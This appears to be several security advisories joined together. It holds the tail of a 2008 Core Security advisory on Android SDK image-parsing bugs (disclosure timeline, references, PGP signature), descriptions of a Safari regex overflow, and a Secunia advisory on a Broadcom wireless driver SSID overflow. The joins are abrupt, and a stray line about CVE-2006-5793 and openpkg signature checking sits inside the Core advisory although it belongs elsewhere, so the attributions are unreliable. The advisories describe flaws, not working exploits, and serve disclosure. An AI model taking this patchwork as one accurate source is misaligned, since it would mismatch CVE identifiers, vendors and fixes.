re-=scheduled for February 27th. 2008. 2008-02-21: Vendor confirms that the GIF and PNG fixes have been released and provides an official statement to the "Vendor Section" of the advisory. A final review of the advisory is requested before its release. The vendor indicates that the Android SDK is still in development and stabilization won't happen until it gets closer to Alpha. Changes to fix the BMP issue are coming soon, priorities are given to issues listed in the public issue tracking system at http://code.google.com/p/android/issues . 2008-02-26: Core indicates that publication of CORE-2008-0124 has been moved to March 3rd 2008, asks if an estimated date for the BMP fix is available and if Core should file the reported and any future bugs in the public issue tracking page. 2008-02-29: Final draft version of advisory CORE-2008-0124 is sent to the vendor as requested. Core requests for any additional comments or statements to be provided by noon March 3rd, 2008 (UTC-5) . 2008-03-01: Vendor requests publication to be delayed one day in order to publish a new release of Android with a fix to the BMP issue. 2008-03-02: Core agrees to delay publication for one day. 2008-03-03: Vendor releases Android SDK m5-rc15 which fixes the BMP vulnerability. Vendor indicates that Android applications run with the credentials of an unprivileged user which decreases the severity of the issues found . 2008-03-04: Further research by Alfredo Ortega reveals that although the vendor statement is correct current versions of Android SDK ship with a passwordless root account. Unprivileged users with shell access can simply use the 'su' program to gain privileges . 2008-03-04: Advisory CORE-2008-0124 is published. *References* [1] Android Overview - Open Handset Alliance - http://www.openhandsetalliance.com/android_overview.html [2] "Android Comes to Life in Barcelona" - The Washington Post , February 11th, 2008 - http://www.washingtonpost.com/wp-dyn/content/article/2008/02/11/AR2008021101944.html [3] Android Developer Challenge - http://code.google.com/android/adc.html [4] "Test Center Preview: Inside Google's Mobile future" - Inforworld, Feb. 27th 2008 - http://www.infoworld.com/article/08/02/27/09TC-google-android_1.html [5] "'Allo, 'allo, Android" - The Sydney Morning Herald, February 26th, 2008 http://www.smh.com.au/news/biztech/allo-allo-android/2008/02/26/1203788290737.html [6] The Shellcoder's Handbook: Discovering and Exploiting Security Holes by Chris Anley , John Heasman , Felix Linder and Gerardo Richarte. Wiley; 2nd edition (August 20, 2007) - http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html [7] Graphics Interchange Format version 89a - http://www.w3.org/Graphics/GIF/spec-gif89a.txt [8] Android downloads page http://code.google.com/p/android/downloads/list [9] Portable Network Graphics (PNG) specification - http://www.w3.org/TR/PNG/ [10] Bitmap File Structures - http://www.digicamsoft.com/bmp/bmp.html *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. *GPG/PGP Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHzZRwyNibggitWa0RAjbdAJ9YztTFlDK9a3YOxAx5avoXQV5LhgCeMs6I teV3ahcSAUFEtsaRCeXVuN8= =u35s -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . The Common Vulnerabilities and Exposures (CVE) project assigned the id CVE-2006-5793 [2] to the problem. Follow the instructions on http://openpkg.org/security/signatures/ for details on how to verify the integrity of this advisory

Buffer overflow in the JavaScript implementation in Safari on Apple Mac OS X 10.4 allows remote attackers to cause a denial of service (application crash) via a long argument to the exec method of a regular expression. Apple Safari web browser is prone to a denial-of-service vulnerability when executing certain JavaScript code. An attacker can exploit this issue to crash an affected browser. Presumably, this issue may also result in remote code execution, but this has not been confirmed. Apple Safari 2.0.4 is vulnerable to this issue; other versions may also be affected. There is a vulnerability in Apple Safari's processing of very long regular expression matching strings. Remote attackers may use this vulnerability to execute arbitrary commands on the user's machine. If a Safari user is tricked into visiting a site that contains malicious JavaScript, a vulnerability in regular expression processing could be triggered, causing the browser to crash or execute arbitrary commands

Stack-based buffer overflow in the Broadcom BCMWL5.SYS wireless device driver 3.50.21.10, as used in Cisco Linksys WPC300N Wireless-N Notebook Adapter before 4.100.15.5 and other products, allows remote attackers to execute arbitrary code via an 802.11 response frame containing a long SSID field. A buffer overflow vulnerability exists in the Broadcom BCMWL5.SYS wireless driver. Successful exploitation of this vulnerability may allow an attacker to execute arbitrary code, or cause a denial-of-service condition. ---------------------------------------------------------------------- To improve our services to our customers, we have made a number of additions to the Secunia Advisories and have started translating the advisories to German. The improvements will help our customers to get a better understanding of how we reached our conclusions, how it was rated, our thoughts on exploitation, attack vectors, and scenarios. This includes: * Reason for rating * Extended description * Extended solution * Exploit code or links to exploit code * Deep links Read the full description: http://corporate.secunia.com/products/48/?r=l Contact Secunia Sales for more information: http://corporate.secunia.com/how_to_buy/15/?r=l ---------------------------------------------------------------------- TITLE: Broadcom Wireless Driver Probe Response SSID Buffer Overflow SECUNIA ADVISORY ID: SA22831 VERIFY ADVISORY: http://secunia.com/advisories/22831/ CRITICAL: Moderately critical IMPACT: System access WHERE: >From remote SOFTWARE: Broadcom NIDS 5.0 Wireless Driver 3.x http://secunia.com/product/12559/ DESCRIPTION: Johnny Cache has reported a vulnerability in Broadcom Wireless driver, which potentially can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to a boundary error in the BCMWL5.SYS device driver when handling probe response requests with a long SSID. This can be exploited to cause a stack-based buffer overflow via a specially crafted packet. The vulnerability is reported in version 3.50.21.10. Other versions may also be affected. SOLUTION: Update to the latest version. Linksys: http://www.linksys.com/servlet/Satellite?c=L_Download_C2&childpagename=US%2FLayout&cid=1115417109934&packedargs=sku%3D1144763513196&pagename=Linksys%2FCommon%2FVisitorWrapper Turn off the wireless card when not in use. PROVIDED AND/OR DISCOVERED BY: Johnny Cache ORIGINAL ADVISORY: http://projects.info-pull.com/mokb/MOKB-11-11-2006.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------